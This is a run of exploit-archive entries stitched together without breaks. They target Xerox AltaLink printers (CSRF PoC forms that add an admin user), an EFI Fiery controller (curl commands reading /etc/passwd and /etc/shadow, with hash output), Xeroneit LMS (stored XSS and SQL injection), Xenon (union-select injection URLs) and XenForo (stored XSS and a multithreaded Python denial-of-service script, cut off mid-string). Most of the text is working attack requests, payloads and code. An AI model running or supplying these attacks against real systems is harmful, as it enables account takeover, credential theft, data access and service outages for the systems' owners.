Referer: https://server/properties/authentication/UserEdit.php?x=&isRoles=True&isPassword=True&isCreate=True&crumb1=UserManager%3Fx%3D%26sort%3DFname%26order%3DUp
Cookie: PHPSESSID=d7c4d8f8efe7dd919e6d0f5c93ec16cd; PageToShow=; statusSelected=n1; statusNumNodes=9; frmFirstName=%22%3E%3Ch1%3Ea; frmLastName=%22%3E%3Ch1%3Ea; frmCompany=%22%3E%3Ch1%3Ea; frmDisplayName=%22%3E%3Ch1%3Ea%2C%20%22%3E%3Ch1%3Ea; frmEmail=test@test.com; frmIFax=324324324324; frmFaxNumber=324324324324; frmFriendlyName=; frmProtocol=SMB; frmXrxAdd_1=Ipv4; frmDocumentPath=; frmLoginName=; frmServerName=; frmServerVolume=; frmNdsTree=; frmNdsContext=; frmSmbShare=; frmHnAdd_1=; frmIpv4_1_1=0; frmIpv4_1_2=0; frmIpv4_1_3=0; frmIpv4_1_4=0; frmIpv6_Host_1=%3A%3A; WebTimerPopupID=4; propSelected=n28; propNumNodes=117; propHierarchy=000100000000000000000000000; LastPage=/properties/authentication/UserEdit.php%3F%26isRoles%3DTrue%26isPassword%3DTrue%26isCreate%3DTrue
Upgrade-Insecure-Requests: 1
CSRFToken=72d9d94444730e9b3d16953c7987c2b0cff73a5d6c60df40ba2804f07d24e494148665ebb53a2633e5a1e8b73ef64ad02536d260928c6f10f408f2e3fd7c0776&_fun_function=HTTP_Set_ccgen_fac_dispatch_fn&NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp&CcgenModule=UserEdit&isRoles=True&isPassword=True&isCreate=True&rolesStr=2%2C5%2C1%2C&limited=False&oid=0&userName=ismailtasdelen&friendlyName=Ismail+Tasdelen&newPassword=Test1234&retypePassword=Test1234&role=2&role=1
HTTP Response :
HTTP/1.1 200 OK
Date: Wed, 18 Dec 2019 22:09:40 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 13518
CSRF HTML PoC :
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://server/dummypost/xerox.set" method="POST">
<input type="hidden" name="CSRFToken" value="72d9d94444730e9b3d16953c7987c2b0cff73a5d6c60df40ba2804f07d24e494148665ebb53a2633e5a1e8b73ef64ad02536d260928c6f10f408f2e3fd7c0776" />
<input type="hidden" name="_fun_function" value="HTTP_Set_ccgen_fac_dispatch_fn" />
<input type="hidden" name="NextPage" value="/properties/authentication/UserManager.php?x=&sort=Fname&order=Up" />
<input type="hidden" name="CcgenModule" value="UserEdit" />
<input type="hidden" name="isRoles" value="True" />
<input type="hidden" name="isPassword" value="True" />
<input type="hidden" name="isCreate" value="True" />
<input type="hidden" name="rolesStr" value="2,5,1," />
<input type="hidden" name="limited" value="False" />
<input type="hidden" name="oid" value="0" />
<input type="hidden" name="userName" value="ismailtasdelen" />
<input type="hidden" name="friendlyName" value="Ismail Tasdelen" />
<input type="hidden" name="newPassword" value="Test1234" />
<input type="hidden" name="retypePassword" value="Test1234" />
<input type="hidden" name="role" value="2" />
<input type="hidden" name="role" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Xerox DC260 EFI Fiery Controller Webtools 2.0 Arbitrary File Disclosure
Vendor: Electronics for Imaging, Inc.
Product web page: http://www.efi.com
Affected version: EFI Fiery Controller SW2.0
Xerox DocuColor 260, 250, 242
Summary: Drive production profitability with Fiery servers and workflow
products. See which Fiery digital front end is right for your current
or future print engines and business needs. Manage all your printers
from a single screen using this intuitive print job management interface.
Desc: Input passed thru the 'file' GET parameter in 'forceSave.php'
script is not properly sanitized before being used to read files. This
can be exploited by an unauthenticated attacker to read arbitrary files
on the affected system.
======================================================================
/wt3/js/save.js:
----------------
103: function parseSaveMessages() {
104: var urlNode = saveDocument.getElementsByTagName('url').item(0);
105: var url = urlNode.firstChild.data;
106: var forcedSaveUrl = "forceSave.php?file=" + url;
107: window.open(forcedSaveUrl, 'save_iframe', 'width=1,height=1');
====
/wt3/forceSave.php:
-------------------
1. <?php
2. //code posted by chrisputnam at gmail dot com
3. function readfile_chunked($filename,$retbytes=true)
4. {
5. $chunksize = 1*(1024*1024); // how many bytes per chunk
6. $buffer = '';
7. $cnt =0;
8. // $handle = fopen($filename, 'rb');
9. $handle = fopen($filename, 'rb');
10. if ($handle === false)
11. {
12. return false;
13. }
14. while (!feof($handle))
15. {
16. //read a chunk
17. $buffer = fread($handle, $chunksize);
18. //send the chunk
19. echo $buffer;
20. //flush the chunk
21. flush();
22. //increment the size read/sent
23. if ($retbytes)
24. {
25. $cnt += strlen($buffer);
26. }
27. }
28. //close file
29. $status = fclose($handle);
30. if ($retbytes && $status)
31. {
32. return $cnt; // return num. bytes delivered like readfile() does.
33. }
34. return $status;
35. }
36.
37. $filename = $_GET['file'];
38. if(!$filename)
39. {
40. echo "ERROR: No filename specified. Please try again.";
41. }
42. else
43. {
44. // fix for IE caching or PHP bug issue
45. header("Pragma: public");
46. header("Expires: 0"); // set expiration time
47. header("Cache-Control: must-revalidate, post-check=0, pre-check=0");
48. // browser must download file from server instead of cache
49.
50. // force download dialog
51. header("Content-Type: application/force-download");
52. header("Content-Type: application/octet-stream");
53. header("Content-Type: application/download");
54.
55. // use the Content-Disposition header to supply a recommended filename and
56. // force the browser to display the save dialog.
57. header("Content-Disposition: attachment; filename=" . basename($filename) . ";");
58. header("Content-Transfer-Encoding: binary");
59.
60. header("Content-Length: " . filesize($filename));
61.
62. set_time_limit(0);
63. readfile_chunked($filename, false);
64.
65. exit();
66. }
67.
68. ?>
======================================================================
Tested on: Debian GNU/Linux 3.1
Apache
PHP/5.4.41
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5447
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5447.php
20.12.2017
--
# curl "http://10.0.0.19/wt3/forceSave.php?file=/etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:100:sync:/bin:/bin/sync
games:x:5:100:games:/usr/games:/bin/sh
...
...
# curl "http://10.0.0.19/wt3/forceSave.php?file=/etc/shadow"
root:LUUVeT6GbOy9I:10978:0:99999:7:::
daemon:*:10979:0:99999:7:::
bin:*:10979:0:99999:7:::
sys:*:10979:0:99999:7:::
sync:*:10979:0:99999:7:::
games:*:10979:0:99999:7:::
...
...
# Exploit Title: Xerox AltaLink C8035 Printer - Cross-Site Request Forgery (Add Admin)
# Date: 2018-12-17
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.xerox.com/
# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/altalink-c8000-series
# Software : Xerox Printer
# Product Version: AltaLink C8035
# Vulernability Type : Cross-Site Request Forgery (Add Admin)
# Vulenrability : Cross-Site Request Forgery
# CVE : N/A
# Description :
# The CSRF vulnerability was discovered in the AltaLink C8035 printer model of Xerox printer hardware.
# A request to add users is made in the Device User Database form field. This request is captured by
# the proxy. And a CSRF PoC HTML file is prepared. Xerox AltaLink C8035 printers allow CSRF. A request
# to add users is made in the Device User Database form field to the xerox.set URI.
# (The frmUserName value must have a unique name.)
# HTTP POST Request :
POST /dummypost/xerox.set HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 707
Origin: https://XXX.XXX.XXX.XXX
Connection: close
Referer: https://XXX.XXX.XXX.XXX/properties/authentication/UserEdit.php?nav_point_key=10
Cookie: PHPSESSID=fd93756986787a2e338da8eae1ff2ef4; statusSelected=n1; statusNumNodes=8; CERT_INFO=8738a6169beda5f6cc754db4fc40ad63; propSelected=n59; propHierarchy=00000001000000000000000010010; LastPage=/properties/authentication/UserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp
Upgrade-Insecure-Requests: 1
NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3F&isRoles=True&isPassword=True&isCreate=True&rolesStr=6%2C1%2C2&limited=0&oid=0&minLength=1&maxLength=63&isFriendlyNameDisallowed=TRUE&isUserNameDisallowed=TRUE&isNumberRequired=&CSRFToken=34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a¤tPage=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10&_fun_function=HTTP_Set_User_Edit_fn&frmFriendlyName=Ismail+Tasdelen&frmUserName=ismailtasdelen&frmNewPassword=Test1234%21&frmRetypePassword=Test1234%21&frmOldPassword=undefined&SaveURL=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10
# CSRF PoC HTML :
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://XXX.XXX.XXX.XXX/dummypost/xerox.set" method="POST">
<input type="hidden" name="NextPage" value="/properties/authentication/UserManager.php?" />
<input type="hidden" name="isRoles" value="True" />
<input type="hidden" name="isPassword" value="True" />
<input type="hidden" name="isCreate" value="True" />
<input type="hidden" name="rolesStr" value="6,1,2" />
<input type="hidden" name="limited" value="0" />
<input type="hidden" name="oid" value="0" />
<input type="hidden" name="minLength" value="1" />
<input type="hidden" name="maxLength" value="63" />
<input type="hidden" name="isFriendlyNameDisallowed" value="TRUE" />
<input type="hidden" name="isUserNameDisallowed" value="TRUE" />
<input type="hidden" name="isNumberRequired" value="" />
<input type="hidden" name="CSRFToken" value="34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a" />
<input type="hidden" name="currentPage" value="/properties/authentication/UserEdit.php?nav_point_key=10" />
<input type="hidden" name="_fun_function" value="HTTP_Set_User_Edit_fn" />
<input type="hidden" name="frmFriendlyName" value="Ismail Tasdelen" />
<input type="hidden" name="frmUserName" value="ismailtasdelen" />
<input type="hidden" name="frmNewPassword" value="Test1234!" />
<input type="hidden" name="frmRetypePassword" value="Test1234!" />
<input type="hidden" name="frmOldPassword" value="undefined" />
<input type="hidden" name="SaveURL" value="/properties/authentication/UserEdit.php?nav_point_key=10" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: Xeroneit Library Management System 3.1 - "Add Book Category " Stored XSS
# Exploit Author: Kislay Kumar
# Date: 2020-12-18
# Vendor Homepage: https://xeroneit.net/
# Software Link: https://xeroneit.net/portfolio/library-management-system-lms
# Affected Version: Version 3.1
# Tested on: Kali Linux
Step 1. Login to the application as Admin.
Step 2. Select "Book" from menu and click on "Book Category" . Now , click
on "Add" Button.
Step 3. Insert payload - "><img src onerror=alert(1)> , in "Category Name"
and Save it.
Step 4. Now you will see an alert box .
# Exploit Title: Xeroneit Library Management System 3.0 - 'category' SQL Injection
# Google Dork: "LMS v3.0 - Xerone IT "
# Date: 2020-04-09
# Exploit Author: Sohel Yousef jellyfish security team
# Software Link:
https://xeroneit.net/portfolio/library-management-system-lms
# Software Demo :https://xeroneit.co/demo/lms/home/login
# Version: v3.0
# Category: webapps
1. Description
scritp has SQLI in books category at this dir
/lms/home/book?category_name=00*SQLI
Error Number: 1064
You have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near '0' GROUP BY
`title`, `author`, `edition` ORDER BY `title` ASC LIMIT 21' at line 3
SELECT sum(cast(cast(book_info.status as char) as SIGNED)) as
available_book, `book_info`.`number_of_books`, `book_info`.`id`,
`book_info`.`category_id`, `book_info`.`title`, `book_info`.`size1` as
`size`, `book_info`.`publishing_year`, `book_info`.`publisher`,
`book_info`.`edition_year`, `book_info`.`subtitle`, `book_info`.`edition`,
`book_info`.`isbn`, `book_info`.`author`, `book_info`.`cover`,
`book_info`.`add_date` FROM `book_info` WHERE FIND_IN_SET('57'',
category_id) !=0 AND `book_info`.`deleted` = '0' GROUP BY `title`,
`author`, `edition` ORDER BY `title` ASC LIMIT 21
Filename: models/Basic.php
Line Number: 284
source: https://www.securityfocus.com/bid/50141/info
Xenon is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
http://www.example.com/news_detail.php?id=-9+union+select+0,1,2,3,group_concat%28table_name%29,5+from+information_schema.tables
http://www.example.com/viewstory.php?id=-8+and+1=1+union+select+0,1,2,group_concat%28column_name%29,4+from+information_schema.columns+where+table_name=0x7573657273
http://www.example.com/event.php?id=-153+union+select+0,1,2,3,4,5,6,7,8,group_concat%28table_name%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables
# Exploit Title: Xenforo Version 2.2.13 - Authenticated Stored XSS
# Date: 2023-06-24
# Exploit Author: Furkan Karaarslan
# Category : Webapps
# Vendor Homepage: https://x.com/admin.php?smilies
# Version: 2.2.12 (REQUIRED)
# Tested on: Windows/Linux
# CVE :
-----------------------------------------------------------------------------
Requests
POST /admin.php?smilie-categories/0/save HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/admin.php?smilies/
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------333176689514537912041638543422
Content-Length: 1038
Origin: http://127.0.0.1
Connection: close
Cookie: xf_csrf=aEWkQ90jbPs2RECi; xf_session=yCLGXIhbOq9bSNKAsymJPWYVvTotiofa; xf_session_admin=wlr6UqjWxCkpfjKlngAvH5t-4yGiK5mQ
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfToken"
1687616851,83fd2350307156281e51b17e20fe575b
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="title"
<img src=x onerror=alert(document.domain)>
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="display_order"
1
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfRequestUri"
/admin.php?smilies/
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfWithData"
1
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfToken"
1687616849,b74724a115448b864ba2db8f89f415f5
-----------------------------333176689514537912041638543422
Content-Disposition: form-data; name="_xfResponseType"
json
-----------------------------333176689514537912041638543422--
Response: After it is created, an alert comes immediately.
# Exploit Title: XenForo CSS Loader DoS
# Google Dork: intext:"Forum software by XenForo™" inurl:css.php ext:php
# Date: 22-03-18
# Exploit Author: LockedByte
# Vendor Homepage: https://xenforo.com/
# Software Link: https://xenforo.com/help/installation/
# Version: XenForo 2
# Tested on: Linux
# 0==================== { Exploit PoC } ====================0
import requests
import sys
import threading
import random
import re
import argparse
host=''
headers_useragents=[]
request_counter=0
printedMsgs = []
def printMsg(msg):
if msg not in printedMsgs:
print "\n"+msg + " after %i requests" % request_counter
printedMsgs.append(msg)
def useragent_list():
global headers_useragents
headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
return(headers_useragents)
def randomString(size):
out_str = ''
for i in range(0, size):
a = random.randint(65, 90)
out_str += chr(a)
return(out_str)
def initHeaders():
useragent_list()
global headers_useragents, additionalHeaders
headers = {
'User-Agent': random.choice(headers_useragents),
'Cache-Control': 'no-cache',
'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
'Referer': 'http://www.google.com/?q=' + randomString(random.randint(5,10)),
'Keep-Alive': str(random.randint(110,120)),
'Connection': 'keep-alive'
}
if additionalHeaders:
for header in additionalHeaders:
headers.update({header.split(":")[0]:header.split(":")[1]})
return headers
def handleStatusCodes(status_code):
global request_counter
sys.stdout.write("\r%i requests has been sent" % request_counter)
sys.stdout.flush()
if status_code == 429:
printMsg("You have been throttled")
if status_code == 500:
printedMsg("Status code 500 received")
def sendGET(url):
global request_counter
headers = initHeaders()
try:
request_counter+=1
request = requests.get(url, headers=headers)
# print 'her'
handleStatusCodes(request.status_code)
except:
pass
def sendPOST(url, payload):
global request_counter
headers = initHeaders()
try:
request_counter+=1
if payload:
request = requests.post(url, data=payload, headers=headers)
else:
request = requests.post(url, headers=headers)
handleStatusCodes(request.status_code)
except:
pass
class SendGETThread(threading.Thread):
def run(self):
try:
while True:
global url
sendGET(url)
except:
pass
class SendPOSTThread(threading.Thread):
def run(self):
try:
while True:
global url, payload
sendPOST(url, payload)
except:
pass
# TODO:
# check if the site stop responding and alert
def main(argv):
parser = argparse.ArgumentParser(description='XenForo CSS Load DoS Exploit PoC. By LockedByte \n Common Usage: python poc.py -u domain.com -c /css.php -t 500')
parser.add_argument('-u', help='Target Domain. Usage: -u \'<domain>\'')
parser.add_argument('-c', help='CSS Loader (/css.php) Path. Usage: -c \'<path>\'')
parser.add_argument('-p', help='Use this only if the PHP file use POST Requests. PHP POST URL. Usage: -p \'<url>\'')
parser.add_argument('-d', help='Use this only if the PHP file use POST Requests. POST DATA.', default=None)
parser.add_argument('-ah', help='Use this only if you want to use different CSS Loads. Additional headers. Usage: -ah \'Content-type: application/json\' \'User-Agent: Doser\'', default=None, nargs='*')
parser.add_argument('-t', help='Number of threads to be used', default=500, type=int)
args = parser.parse_args()
global url, payload, additionalHeaders
additionalHeaders = args.ah
payload = args.d
if args.u:
url = 'http://' + args.u + args.c + '?css=xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,login_page,admin,BRMS_ModernStatistic,BRMS_ModernStatistic_dark,bb_code,xenforo,form,public,login_bar,notices,panel_scroller,moderator_bar,uix,uix_style,uix_dark,EXTRA,family,l